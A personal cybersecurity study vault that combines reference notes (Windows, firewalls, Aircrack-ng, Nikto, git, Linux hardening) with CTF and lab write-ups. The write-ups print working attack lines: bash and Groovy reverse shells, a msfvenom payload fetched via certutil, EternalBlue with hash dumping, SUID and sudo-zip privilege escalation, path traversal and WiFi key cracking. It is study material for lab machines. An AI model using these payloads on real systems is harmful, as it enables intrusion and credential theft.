The Lockheed Martin kill chain focuses on a perimeter or external breach. Unlike other kill chains, it does not provide an in-depth breakdown of internal movement. You can think of this kill chain as a summary of all behaviors and operations present.

Components of the kill chain are broken down in the table below.

|Technique| Purpose| Examples| | --- | --- | |Reconnaissance| Obtain information on the target |Harvesting emails, OSINT| |Weaponization| Combine the objective with an exploit. Commonly results in a deliverable payload.| Exploit with backdoor, malicious office document| |Delivery |How will the weaponized function be delivered to the target| Email, web, USB| |Exploitation| Exploit the target's system to execute code |MS17-010, Zero-Logon, etc.| |Installation| Install malware or other tooling |Mimikatz, Rubeus, etc.| |Command & Control Control |the compromised asset from a remote central controller |Empire, Cobalt Strike, etc.| |Actions on Objectives| Any end objectives: ransomware, data exfiltration, etc.|Conti, LockBit2.0, etc. |

[Vault: System Security] Windows

Sat, 15 Nov 2025 09:39:56 GMT

NTFS

The file system used in modern versions of Windows is the New Technology File System or simply NTFS .

Before NTFS, there was FAT16/FAT32 (File Allocation Table) and HPFS (High Performance File System).

NTFS is known as a journaling file system. In case of a failure, the file system can automatically repair the folders/files on disk using information stored in a log file. This function is not possible with FAT.

NTFS addresses many of the limitations of the previous file systems; such as:

Supports files larger than 4GB
Set specific permissions on folders and files
Folder and file compression
Encryption ( Encryption File System or EFS )

On NTFS volumes, you can set permissions that grant or deny access to files and folders.

The permissions are:

Full control
Modify
Read & Execute
List folder contents
Read
Write

![[attachments/Windows-1763197416160.png]]

Another feature of NTFS is Alternate Data Streams ( ADS ).

Alternate Data Streams (ADS) is a file attribute specific to Windows NTFS (New Technology File System).

Every file has at least one data stream ( $DATA ), and ADS allows files to contain more than one stream of data. Natively Window Explorer doesn't display ADS to the user. There are 3rd party executables that can be used to view this data, but Powershell gives you the ability to view ADS for files.

From a security perspective, malware writers have used ADS to hide data.

Windows Folder

The Windows folder ( C:\Windows ) is traditionally known as the folder which contains the Windows operating system.

The folder doesn't have to reside in the C drive necessarily. It can reside in any other drive and technically can reside in a different folder.

The system environment variable for the Windows directory is %windir% .

The System32 folder holds the important files that are critical for the operating system.

UAC

User accounts can be one of two types on a typical local Windows system: Administrator & Standard User. The user account type will determine what actions the user can perform on that specific Windows system.

An Administrator can make changes to the system: add users, delete users, modify groups, modify settings on the system, etc.
A Standard User can only make changes to folders/files attributed to the user & can't perform system-level changes, such as install programs.

There are several ways to determine which user accounts exist on the system.

One way is to click the Start Menu and type Other User. A shortcut to System Settings > Other users should appear.
Another way to access this information, and then some, is using Local User and Group Management. Right-click on the Start Menu and click Run. Type lusrmgr.msc

A user doesn't need to run with high (elevated) privileges on the system to run tasks that don't require such privileges, such as surfing the Internet, working on a Word document, etc. This elevated privilege increases the risk of system compromise because it makes it easier for malware to infect the system. Consequently, since the user account can make changes to the system, the malware would run in the context of the logged-in user.

To protect the local user with such privileges, Microsoft introduced User Account Control (UAC). This concept was first introduced with the short-lived Windows Vista and continued with versions of Windows that followed.

Note : UAC (by default) doesn't apply for the built-in local administrator account.

How does UAC work? When a user with an account type of administrator logs into a system, the current session doesn't run with elevated permissions. When an operation requiring higher-level privileges needs to execute, the user will be prompted to confirm if they permit the operation to run.

[Vault: System Security] Security Devices and Technologies

Wed, 29 Oct 2025 17:28:42 GMT

Router Intrusion prevention system VPN Antivirus

Firewall

In computer networking, a firewall is designed to control or filter which communications are allowed in and which are allowed out of a device or network. A firewall can be installed on a single computer with the purpose of protecting that one computer (host-based firewall) or it can be a standalone network device that protects an entire network of computers and all of the host devices on that network (network-based firewall).

As computer and network attacks have become more sophisticated, new types of firewalls have been developed, which serve different purposes.

Network layer firewall

This filters communications based on source and destination IP addresses.

Transport layer firewall

Filters communications based on source and destination data ports, as well as connection states.

Application layer firewall

Filters communications based on an application, program or service.

Context aware layer firewall

Filters communications based on the user, device, role, application type and threat profile.

Proxy server

Filters web content requests like URLs, domain names and media types.

Reverse proxy server

Placed in front of web servers, reverse proxy servers protect, hide, offload and distribute access to web servers.

Network address translation (NAT) firewall

This firewall hides or masquerades the private addresses of network hosts.

Host-based firewall

Filters ports and system service calls on a single computer operating system.

Incident Detection and Prevention Systems

IDS

An IDS (Intrusion Detection Systems) can either be a dedicated network device or one of several tools in a server, firewall or even a host computer operating system, such as Windows or Linux, that scans data against a database of rules or attack signatures, looking for malicious traffic. If a match is detected, the IDS will log the detection and create an alert for a network administrator. It will not take action and therefore it will not prevent attacks from happening. The job of the IDS is to detect, log and report. The scanning performed by the IDS slows down the network (known as latency). To prevent network delay, an IDS is usually placed offline, separate from regular network traffic. Data is copied or mirrored by a switch and then forwarded to the IDS for offline detection.

IPS

An IPS can block or deny traffic based on a positive rule or signature match. One of the most well-known IPS/IDS systems is Snort. The commercial version of Snort is Cisco’s Sourcefire. Sourcefire can perform real-time traffic and port analysis, logging, content searching and matching, as well as detect probes, attacks and execute port scans. It also integrates with other third-party tools for reporting, performance and log analysis.

[[SIEM]]

DLP

A Data Loss Prevention (DLP) system is designed to stop sensitive data from being stolen from or escaping a network. It monitors and protects data in three different states: data in use (data being accessed by a user), data in motion (data traveling through the network) and data at rest (data stored in a computer network or device).

Security Best Practices

Many national and professional organizations have published lists of security best practices. Some of the most helpful guidelines are found in organizational repositories such as the National Institute of Standards and Technology (NIST) Computer Security Resource Center.

Perform a risk assessment

Knowing and understanding the value of what you are protecting will help to justify security expenditures.

Create a security policy

Create a policy that clearly outlines the organization’s rules, job roles, and responsibilities and expectations for employees.

Physical security measures

Restrict access to networking closets and server locations, as well as fire suppression.

Human resources security measures

Background checks should be completed for all employees.

Perform and test backups

Back up information regularly and test data recovery from backups.

Maintain security patches and updates

Regularly update server, client and network device operating systems and programs.

Employ access controls

Configure user roles and privilege levels as well as strong user authentication.

Regularly test incident response

Employ an incident response team and test emergency response scenarios.

Implement a network monitoring, analytics and management tool

Choose a security monitoring solution that integrates with other technologies.

Implement network security devices

Use next generation routers, firewalls and other security appliances.

Implement a comprehensive endpoint security solution

Use enterprise level antimalware and antivirus software.

Educate users

Provide training to employees in security procedures.

Encrypt data

Encrypt all sensitive organizational data, including email.

[Vault: Tools] Aircrack-ng

Wed, 29 Oct 2025 17:28:42 GMT

Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security:

Monitoring: Packet capture and export of data to text files for further processing by third party tools
Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
Testing: Checking WiFi cards and driver capabilities (capture and injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)
aircrack-ng
- is an 802.11 WEP, 802.11i WPA/WPA2, and 802.11w WPA2 key cracking program.
- used to crack the WPA/WP2 passphrase using the captured WPA handshake
airmon‐ng
- used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode.
- Entering the airmon‐ng command without parameters will show the interfaces status.
- to start monitor mode on an interface : airmon-ng start [interface]
- It can also list/kill programs that can interfere with the wireless card operation using the airmon-ng check kill command.
airodump-ng
- used for packet capture, capturing raw 802.11 frames. (here it is used to capture the 4-way handshake)
- airodump-ng -c [channel] --bssid [bssid of device] -w [out_capture] [interface]
aireplay-ng
- sends deauthentication packets to either a specific client (targeted attack) or to all clients connected to an access point (broadcast attack).
packetforge-ng
- a tool to create encrypted packets that can subsequently be used for injection. You may create various types of packets such as arp requests, UDP, ICMP and custom packets. The most common use is to create ARP requests for subsequent injection.
- To create an encrypted packet, you must have a PRGA (pseudo random generation algorithm) file. This is used to encrypt the packet you create. This is typically obtained from aireplay‐ng chopchop or fragmentation attacks.

Cracking WEP PSK

An attacker can also use the Aircrack-ng set of tools to crack (recover) the WEP PSK. To perform this attack using the Aircrack-ng suite, an attacker first launches Airmon-ng, as shown in Example 5-16.

Example 5-16 - Using Airmon-ng to Monitor a Wireless Network

root@kali# airmon-ng start wlan0 11

In Example, 5-16 the wireless interface is wlan0, and the selected wireless channel is 11. Now the attacker wants to listen to all communications directed to the BSSID 08:02:8E:D3:88:82, as shown in Example 5-17. The command in Example 5-17 writes all the traffic to a capture file called omar_capture.cap. The attacker only has to specify the prefix for the capture file.

Example 5-17 - Using Airodump-ng to Listen to All Traffic to the BSSID 08:02:8E:D3:88:82

root@kali# airodump-ng -c 11 --bssid 08:02:8E:D3:88:82 -w omar_capture wlan0

The attacker can use Aireplay-ng to listen for ARP requests and then replay, or inject, them back into the wireless network, as shown in Example 5-18.

Example 5-18 - Using Aireplay-ng to Inject ARP Packets

root@kali# aireplay-ng -3 -b 08:02:8E:D3:88:82 -h 00:0F:B5:88:AC:82 wlan0

The attacker can use Aircrack-ng to crack the WEP PSK, as demonstrated in Example 5-19.

Example 5-19 - Using Aircrack-ng to Crack the WEP PSK

root@kali# aircrack-ng -b 08:02:8E:D3:88:82 omar_capture.cap

After Aircrack-ng cracks (recovers) the WEP PSK, the output in Example 5-20 is displayed. The cracked (recovered) WEP PSK is shown in the highlighted line.

Example 5-20 - The Cracked (Recovered) WEP PSK

                                              Aircrack-ng 0.9

                                 [00:02:12] Tested 924346 keys (got 99821 IVs)

 KB  depth byte(vote)
 0     0/ 9 12( 15) A9( 25) 47( 22) F7( 12) FE( 22) 1B( 5) 77( 3) A5( 5) F6( 3) 02( 20)
 1     0/ 8 22( 11) A8( 27) E0( 24) 06( 18) 3B( 26) 4E( 15) E1( 13) 25( 15) 89( 12) E2( 12)
 2     0/ 2 32( 17) A6( 23) 15( 27) 02( 15) 6B( 25) E0( 15) AB( 13) 05( 14) 17( 11) 22( 10)
 3     1/ 5 46( 13) AA( 20) 9B( 20) 4B( 17) 4A( 26) 2B( 15) 4D( 13) 55( 15) 6A( 15) 7A( 15)

                        KEY FOUND! [ 56:7A:15:9E:A8 ]

      Decrypted correctly: 100%

Cracking WPA PSK

Step 1. The attacker uses Airmon-ng to start the wireless interface in monitoring mode, using the airmon-ng start wlan0 command. Figure displays three terminal windows. The second terminal window from the top shows the output of the airodump-ng wlan0 command, displaying all adjacent wireless networks. Step 2. After locating the corp-net network, the attacker uses the airodump-ng command, as shown in the first terminal window displayed in Figure 5-21, to capture all the traffic to a capture file called wpa_capture, specifying the wireless channel (11 , in this example), the BSSID, and the wireless interface (wlan0). ![[attachments/Aircrack-ng-1751398180489.png]] Step 3. The attacker uses the aireplay-ng command, as shown in Figure 5-22, to perform a deauthentication attack against the wireless network. In the terminal shown at the top of Figure 5-23, you can see that the attacker has collected the WPA handshake. ![[attachments/Aircrack-ng-1751398215941.png]] Step 4. The attacker uses the aircrack-ng command to crack the WPA PSK by using a word list, as shown in Figure 5-23. (The filename is words in this example.) ![[attachments/Aircrack-ng-1751398339082.png]] Step 5. The tool takes a while to process, depending on the computer power and the complexity of the PSK. After it cracks the WPA PSK, a window similar to the one shown in Figure 5-24 shows the WPA PSK (corpsupersecret in this example). ![[attachments/Aircrack-ng-1751398366544.png]]

[Vault: Tools] Nikto

Wed, 29 Oct 2025 17:28:42 GMT

Nikto is a popular web vulnerability scanner that can find SQL injection, XSS, and other common vulnerabilities in websites. It can identify installed software using page headers and files. Nikto supports both HTTP and HTTPS protocols.

Nikto is an open-source web vulnerability scanner that can be downloaded from https://github.com/sullo/nikto. Nikto’s official documentation can be accessed at https://cirt.net/nikto2-docs

[!tip] Basic usage:
nikto -h [target]

NAME
         nikto - Scan web server for known vulnerabilities
SYNOPSIS
       /usr/local/bin/nikto [options...]
DESCRIPTION
       Examine a web server to find potential problems and security
vulnerabilities, including:
    · Server and software misconfigurations
    · Default files and programs
    · Insecure files and programs
    · Outdated servers and programs
 Nikto is built on LibWhisker (by RFP) and can run on any platform
which has a Perl environment. It supports SSL, proxies, host
authentication, IDS evasion and more. It can be updated automatically
from the command-line, and supports the optional submission of updated
version data back to the maintainers.

Params

Nikto scans for port 80 web services. To scan domains with HTTPS enabled, you must specify the -ssl flag to scan port 443: nikto -h https://nmap.org -ssl
-Tuning+
- Scan tuning: 1 Interesting File / Seen in logs 2 Misconfiguration / Default File 3 Information Disclosure 4 Injection (XSS/Script/HTML) 5 Remote File Retrieval - Inside Web Root 6 Denial of Service 7 Remote File Retrieval - Server Wide 8 Command Execution / Remote Shell 9 SQL Injection 0 File Upload a Authentication Bypass b Software Identification c Remote Source Inclusion d WebService e Administrative Console x Reverse Tuning Options (i.e., include all except specified)

Investigate

Nikto provides some information about the vulnerabilities that it uncovers during its scans. Some vulnerabilities are associated with an OSVDB number (an older Open Source Vulnerability Database), a [[CVE, CWE, CVSS|CWE]]. OSVDB was discontinued in 2016. You can use the CVE reference tool to translate the OSVDB identifier to a CVE entry so you can research the vulnerability further. Use the National Vulnerability Database (https://nvd.nist.gov) to find additional information on the CVEs.

Export

Nikto can output the results of a scan in various formats including CSV, HTML, SQL, txt, and XML. In addition, Nikto can be paired with Metasploit to launch exploits against the vulnerabilities that you uncover.

To export a scan result, use the -o flag followed by the file name. Export the results of a scan to an HTML report file named scan_results.htm. The output file type is determined from the file extension. nikto -h 172.17.0.2 -o scan_results.htm
To specify a text file output format that is independent of the file extension, use the -Format flag. Use the -Format csv option to save the file in .csv format to import into other analysis applications. nikto -h 172.17.0.2 -o scan_results.txt -Format csv

You can automate the scanning of multiple hosts by using Nmap and Nikto together. For example, you can scan the 10.1.1.0/24 subnet with Nmap and then pipe the results to Nikto, as demonstrated in Example 10-20.

root@kali:~# nmap -p 80 10.1.1.0/24 -oG - | nikto -h -
- Nikto v2.1.6
----------------------------------------------------------------------
+ nmap Input Queued: 10.1.1.11:80
+ nmap Input Queued: 10.1.1.12:80
+ nmap Input Queued: 10.1.1.14:80
+ Target IP:               10.1.1.12
+ Target Hostname:       10.1.1.12
+ Target Port:            80
+ Start Time:          2018-06-23 22:56:15 (GMT-4)
<output omitted for brevity>
+ 22798 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:             2018-06-23 22:57:00 (GMT-4) (30 seconds)
----------------------------------------------------------------------
+ 3 host(s) tested

[Vault: Writeups] Academy

Wed, 29 Oct 2025 17:28:42 GMT

to know ip of box
- dhclient
- ip a

ports : 21/tcp ftp, 22/tcp ssh, 80/tcp http ftp :

note.txt present use get [filename] to transfer file username : 10201321
use hash-identifier to crack hashes
used [[Hashcat]] to crack
- password is student
used [[ffuf]] to dir bust
- found 192.168.60.6/academy 192.168.60.6/phpmyadmin
uploaded a php reverse shell script link and gained assess as www-data
used [[linpeas#linpeas|linpeas]] to search for any priv escalation
- found * * * * * /home/grimmie/backup.sh
- /var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
from cat /etc/passwd we find grimmie is a user and admin
ssh grimmie@192.168.60.6 with My_V3ryS3cur3_P4ss
- got access of grimmie@academy
- but still no sudo access sudo -l
- check history
- try running linpeas again to check if anything has changed
- ls gives backup.sh
- crontab is used run services/script periodically
  - check crontab -l : no crontab for grimmie
  - check crontab -u root -l
  - check crontab -e
  - systemctl list-timers
  - used [[pspy]] to confirm
    - we find backup.sh runs periodically
we can exploit this by using a bash reverse shell one liner
- -> `bash -i >& /dev/tcp/[host ip]/[port] 0>&1 - 192.168.60.4/8081
- replace backup.sh with this code
- setup nc listener on [port] on host machine
SUCCESS
- root@academy achieved
- found flag.txt

[Vault: Writeups] blackpearl

Wed, 29 Oct 2025 17:28:42 GMT

ip 192.168.60.9
nmap gives 22/ssh, 53/domain (dns) , 80/http
viewing page source we find 
ffuf 192.168.60.9 gives /secret
we get a file named secret , saying dir busting wont get you anywhere
recon /53 dns
- dnsrecon -r 127.0.0.0/24 -n [ip|192.168.60.9] -d hi
- output [+] PTR blackpearl.tcm 127.0.0.1 [+] 1 Records Found
- we have add that dns to our system
  - nano /etc/hosts
  - add [ip|192.168.60.9] blackpearl.tcm
- now we can access blackpearl.tcm from our machine
ffuf blackpearl.tcm gives /navigate
we find navigatecms login page : with infos v2.3

we find navigatecms exploit in metasploit : Navigate CMS Unauthenticated Remote Code Execution - ```Description: This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication.

  	  The module then uses a path traversal vulnerability in navigate_upload.php
  	  that allows authenticated users to upload PHP files to arbitrary locations.
  	  Together these vulnerabilities allow an unauthenticated attacker to
  	  execute arbitrary PHP code remotely.```

we use exploit/multi/http/navigate_cms_rce
- set rhost
- set vhost blackpearl.tcm
- exploit works !! meterpreter session opens
- open a shell by using shell
we have access as www-data
to open a tty shell
- check if python is available which python
- python3 -c 'import pty;pty.spawn("/bin/bash")'
search for priv escalation using [[linpeas]]
we find Unknown SUID binary in linpeas
- here we have access run it in root group privilege
use find / -type f -perm -4000 2>/dev/null to list files with these permissions in a neater way (same thing linpeas did).
check if any of it has any priv escalation in gtfobin.
we find php has a vuln in SUID
- ./php -r "pcntl_exec('/bin/sh', ['-p']);"
- find where php binary is stored -> /usr/bin/php
- run /usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
- SUCCESS , access as root received
- id -> uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
- flag found Good job on this one. Finding the domain name may have been a little guessy, but the goal of this box is mainly to teach about Virtual Host Routing which is used in a lot of CTF.

[Vault: Root] git

Sat, 25 Oct 2025 08:59:37 GMT

Git is a free, open-source distributed version control system designed to track changes in source code during software development. It was created by Linus Torvalds in 2005 for Linux kernel development, and has become the global industry standard, used by over 93% of developers.

GitHub is a cloud-based platform that uses Git to help developers store, manage, and collaborate on software projects.

Cheatsheet - https://training.github.com/downloads/github-git-cheat-sheet/

Essential Commands

git init: Initializes a new local Git repository.
git clone [url]: Downloads an existing repository from a remote server (like GitHub).
git add [file]: Adds changes in your working directory to your staging area.
git commit -m "[message]": Saves your staged changes as a permanent snapshot in the history.
git push: Sends your local commits to a remote repository.
git fetch: Fetches changes from remote repository and adds to the master branch.
git pull: Fetches and merges changes from a remote repository to your local machine.

Setup

install git
Set git name and email.
Auth / Connect to GH : can be done via HTTPS / SSH

Configuration

Set your name:
git config --global user.name "Your Name"
Set your email:
git config --global user.email "youremail@example.com"
Set default branch name (recommended):
git config --global init.defaultBranch main
Show current config. (This is usually stored in .gitconfig file in the home directory) git config --list

SSH Auth

SSH URLs provide access to a Git repository via SSH, a secure protocol. To use these URLs, you must generate an SSH keypair on your computer and add the public key to your account on GitHub. For more information, see Connecting to GitHub with SSH.

Generate SSH key
- ssh-keygen -t ed25519 -C "your_email@example.com"
- give location to save
- enter passphrase if needed
Adding your SSH key to the ssh-agent
- Start the ssh-agent in the background. : eval "$(ssh-agent -s)"
- Add your SSH private key to the ssh-agent : ssh-add ~/.ssh/id_ed25519
Add the SSH public key to your account on GitHub.
- Copy the SSH public key to your clipboard : cat ~/.ssh/id_ed25519.pub
- Go to Github Settings -> Access -> SSH and GPG keys.
- Click New SSH key or Add SSH key.
- In the "Title" field, add a descriptive label for the new key.
- Select the type of key, either authentication or signing. For more information about commit signing, see About commit signature verification.
- In the "Key" field, paste your public key.
- Click Add SSH key.
- If prompted, confirm access to your account on GitHub.
Test SSH connection
- ssh -T git@github.com
- verify fingerprint
- Then if you get this message : Hi USERNAME! You've successfully authenticated, but GitHub does not provide shell access. :: SUCCESS.

Tips

Add .patch to the end of a github commit url to see details about that commit (Including author,author email, commit diffs).
To show change history of files: git log --follow -p file

[Vault: Vulns & Attacks] Network Attacks

Sat, 25 Oct 2025 08:59:37 GMT

Network-based vulnerabilities and exploits can be catastrophic because of the types of damage and impact they can cause in an organization. The following are some examples of network-based attacks and exploits:

[[Windows Name Resolution Attacks|Windows name resolution-based attacks and exploits]]
[[SMB Vulnerabilities|Attacks and exploits against Server Message Block implementations]]
[[DNS Exploits|DNS cache poisoning attacks]]
[[SNMP Exploits|Simple Network Management Protocol vulnerabilities and exploits]]
[[SMTP Exploits|Simple Mail Transfer Protocol SMTP vulnerabilities and exploits]]
[[FTP Exploits|File Transfer Protocol FTP - vulnerabilities and exploits]]
[[Pass-the-Hash Attacks]]
[[Kerberos and LDAP-Based Attacks]]
On-path attacks (previously known as man-in-the-middle [[MITM or On-Path Attacks]] )
SSL stripping attacks
Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks - [[DoS and DDoS Attacks]]
[[NAC bypass]]
Virtual local area network - [[VLAN Hopping]] attacks
[[DHCP Attacks]]

[[Wireless Vulnerabilities and Attacks]]

[Vault: Writeups] Blue

Sat, 25 Oct 2025 08:59:37 GMT

27/12/2023

ip 192.168.60.5
Windows 7 Ultimate 7601 Service Pack 1
found eternalblue exploit

2 ways to check if a vulnerabiltiy is applicable

use an auxillary module
use an exploit and use check command

used `auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection` -> no result

used `exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption`

check gives The target is vulnerable. exploited succesfully
use hashdump to get hashes

meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:f580a1940b1f6759fbdd9f5c482ccdbb::: user:1000:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

used https://github.com/3ndG4me/AutoBlue-MS17-010.git

┌──(root㉿kali)-[/opt/AutoBlue-MS17-010] └─# python eternal_checker.py 192.168.60.5 [] Target OS: Windows 7 Ultimate 7601 Service Pack 1 [!] The target is not patched === Testing named pipes === [] Done

sudo ./shell_prep.sh
sudo ./listener_prep.sh 
python eternalblue_exploit7.py 192.168.60.5 shellcode/sc_all.bin

[Vault: Writeups] Butler

Sat, 25 Oct 2025 08:59:37 GMT

nmap - open ports - 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 8080/tcp open http Jetty 9.4.41.v20210516
we get a jenkins login page
used burpsuite intruder to bruteforce login
- jenkins:jenkins worked !!
got access to jenkins profile
exploited script console in manage jenkins using a groovy reverse shell
- https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76

	  String host="localhost";
		int port=8044;
		String cmd="cmd.exe";
		Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

- changed host to my ip
- set up a listener in port 8044
- worked

got access as butler/butler
systeminfo
priv escalation using winpeas
- start a python server in transfer folder
- certutil.exe -urlcache -f http://192.168.60.4/winpeas.exe winpeas.exe
- exploit unquoted service path in C:\\Program Files (x86)\Wise\Wise Care 365\BootTime.exe
- here we can add a malicious \Wise\wise.exe and exploit it
create a payload using msfvenom
- msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.60.4 LPORT=7777 -f exe > Wise.exe
- open a listener on 7777
- goto C:\Program Files (x86)\Wise and put Wise.exe in there using certutil.exe -urlcache -f http://192.168.60.4/Wise.exe Wise.exe
- we need Wise.exe to run as root
- so we stop it using sc stop WiseBootAssistant
- check status sc query WiseBootAssisant
- then restart sc start WiseBootAssisant
- a shell opens in :7777 with nt authority\system access.
- SUCCESS

[Vault: Writeups] Dev

Sat, 25 Oct 2025 08:59:37 GMT

ip 192.168.60.7 nmap gives open ports 80/http, 8080/http, 22/ssh, 2049/nfs, 111/rpcbind

from http://192.168.60.7/app/config/config.yml we find username: bolt password: I_love_java
to list directories in a fileshare showmount -e 192.168.60.7

		Export list for 192.168.60.7:
		/srv/nfs 172.16.0.0/12,10.0.0.0/8,192.168.0.0/16```

to mount
- make a directory to mount filesystem to : mkdir /mnt/[foldername|dev]
- mount -t nfs [ip]:[share path] [dir to mount to] - mount -t nfs 192.168.60.7:/srv/nfs /mnt/dev
found save.zip
to unzip unzip [path]
we can use fcrackzip to crack
- fcrackzip -v -u -D -p [dictionary] [filepath]
  - -v : verbose
  - -u : unzip
  - -D : dictionary attack
  - -p : using a file
password found as java101
unziping gives 2 files : id_rsa and todo.txt

in searchsploit we find a boltfire vuln BoltWire 6.03 - Local File Inclusion

  Steps to Reproduce:
  1) Using HTTP GET request browse to the following page, whilst being authenticated user.
  http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd

it works at http://192.168.60.7:8080/dev/index.php?p=action.search&action=../../../../../../../etc/passwd
we find user jeanpaul
ssh -i id_rsa jeanpaul@192.168.60.7 with password: I_love_java gives access to jeanpaul@dev
sudo -l gives User jeanpaul may run the following commands on dev: (root) NOPASSWD: /usr/bin/zip
ie., zip can run as root with no password
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
- in it we find that there is vuln to get to sudo If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
```
  TF=$(mktemp -u)
    sudo zip $TF /etc/hosts -T -TT 'sh #'
    sudo rm $TF
```
GOT access as root
- found flag.txt - Congratz on rooting this box !

[Vault: Writeups / Hacker101] Petshop Pro

Sat, 25 Oct 2025 08:59:37 GMT

Easy | Web

ctf url: https://ctf.hacker101.com/

Flag 1

Inspect /cart.
We see hidden input field containing item details
POST /checkout content

URL encoded:

cart=%5B%5B0%2C+%7B%22name%22%3A+%22Kitten%22%2C+%22desc%22%3A+%228%5C%22x10%5C%22+color+glossy+photograph+of+a+kitten.%22%2C+%22logo%22%3A+%22kitten.jpg%22%2C+%22price%22%3A+8.95%7D%5D%5D

Decoded JSON array:

[
  [0, {
    "name": "Kitten",
    "desc": "8\"x10\" color glossy photograph of a kitten.",
    "logo": "kitten.jpg",
    "price": 8.95
  }]
]

Change item price to 0 in burp or the hidden input field we get 1st flag in the checkout page ![[attachments/Petshop-Pro-1759060200155.png]]

Flag 2

Fuzz url to find other pages
found admin page login at /login
Bruteforce credentials using hydra or fuzz or burp turbo intruder
used names.txt from seclist

![[attachments/Petshop-Pro-1759060805150.png]]

![[attachments/Petshop-Pro-1759059507607.png]]

Flag 3

Try XSS in item name ![[attachments/Petshop-Pro-1759060427511.png]] Go to cart ![[attachments/Petshop-Pro-1759060498783.png]]

[Vault: Writeups] Kioptrix

Sat, 25 Oct 2025 08:59:37 GMT

Identify kioptrix ip
- login using username: john & password: TwoCows2 , & ping to any ip find ip
- use arp-scan -l
- use netdiscover -r 192.168.50.0/24 (put the first 3 parts of your ip & .0/24)

[Vault: Writeups / THM] THM_W1seGuy

Sat, 25 Oct 2025 08:59:37 GMT

nc 10.10.170.35 1337
This XOR encoded text has flag 1: 651b3c3e1300321d2b17742b0504174567122e00703d0376025d1f082d364327087516432b3e371e
What is the encryption key?

Cyberchef:

fallback
XOR({'option':'Hex','string':'651b3c1e'},'Standard',false)

Input: THM{} Output: 1SqEc Cyberchef:

fallback
From_Hex('Auto')
XOR({'option':'Latin1','string':'REDACTED'},'Standard',false)

Input: 651b3c3e1300321d2b17742b0504174567122e00703d0376025d1f082d364327087516432b3e371e Output: THM{p1alntExtAtt4ckcAnr3alLyhUrty0urxOr} --> Flag1

nc 10.10.170.35 1337
This XOR encoded text has flag 1: 651b3c3e1300321d2b17742b0504174567122e00703d0376025d1f082d364327087516432b3e371e
What is the encryption key? 1SqEc
Congrats! That is the correct key! Here is flag 2: THM{BrUt3_ForC1nG_XOR_cAn_B3_FuN_nO?}

Python

import random
import socketserver 
import socket, os
import string

flag = open('flag.txt','r').read().strip()

def send_message(server, message):
    enc = message.encode()
    server.send(enc)

def setup(server, key):
    flag = 'THM{thisisafakeflag}' 
    xored = ""

    for i in range(0,len(flag)):
        xored += chr(ord(flag[i]) ^ ord(key[i%len(key)]))

    hex_encoded = xored.encode().hex()
    return hex_encoded

def start(server):
    res = ''.join(random.choices(string.ascii_letters + string.digits, k=5))
    key = str(res)
    hex_encoded = setup(server, key)
    send_message(server, "This XOR encoded text has flag 1: " + hex_encoded + "\n")
    
    send_message(server,"What is the encryption key? ")
    key_answer = server.recv(4096).decode().strip()

    try:
        if key_answer == key:
            send_message(server, "Congrats! That is the correct key! Here is flag 2: " + flag + "\n")
            server.close()
        else:
            send_message(server, 'Close but no cigar' + "\n")
            server.close()
    except:
        send_message(server, "Something went wrong. Please try again. :)\n")
        server.close()

class RequestHandler(socketserver.BaseRequestHandler):
    def handle(self):
        start(self.request)

if __name__ == '__main__':
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    server = socketserver.ThreadingTCPServer(('0.0.0.0', 1337), RequestHandler)
    server.serve_forever()%

[Vault: Linux] Securing Linux Servers

Sat, 25 Oct 2025 08:42:42 GMT

Update software and system
Update docker containers (use watchtower to auto update)

Create a user other than root

useradd username -m -s /bin/bash
usermod -aG sudo,adm,docker username
\#to add/change password
passwd username

setup ssh keys

in client machine

ssh-keygen -b 4096 -C "some comments/ who this key is for" 
# set up passphrase if needed

\#to check 
cd .ssh
# id_rsa is private key. do not share this
# id_rsa.pub is public key.

# in server
cd /home/username
mkdir .ssh

\#in client
scp id_rsa.pub root@homeservername:/home/username/.ssh/authorised_keys \#give creds

\#in server
chown -R username:username .ssh

Disable root login

sudo nano /etc/ssh/sshd_config
# change PermitRootLogin value from yes to no
# to disable text password change PassworAuthentication to no

# restart ssh to apply changes
sudo systemctl restart ssh

Control network IN and OUT

\#get a list of all applications that are currently listening on network ports
ss -ltpn
\#go through all of them and find out if you really need them what are they for and what exactly are they doing
\#all ip addresses with 0.0.0.0 are applications that are listening on all incoming interfaces
\#port 80 for http, 443 for https and 22 for ssh

Configure Firewall

# allow ssh
sudo ufw allow 22
# to enable
sudo ufw enable
sudo ufw status

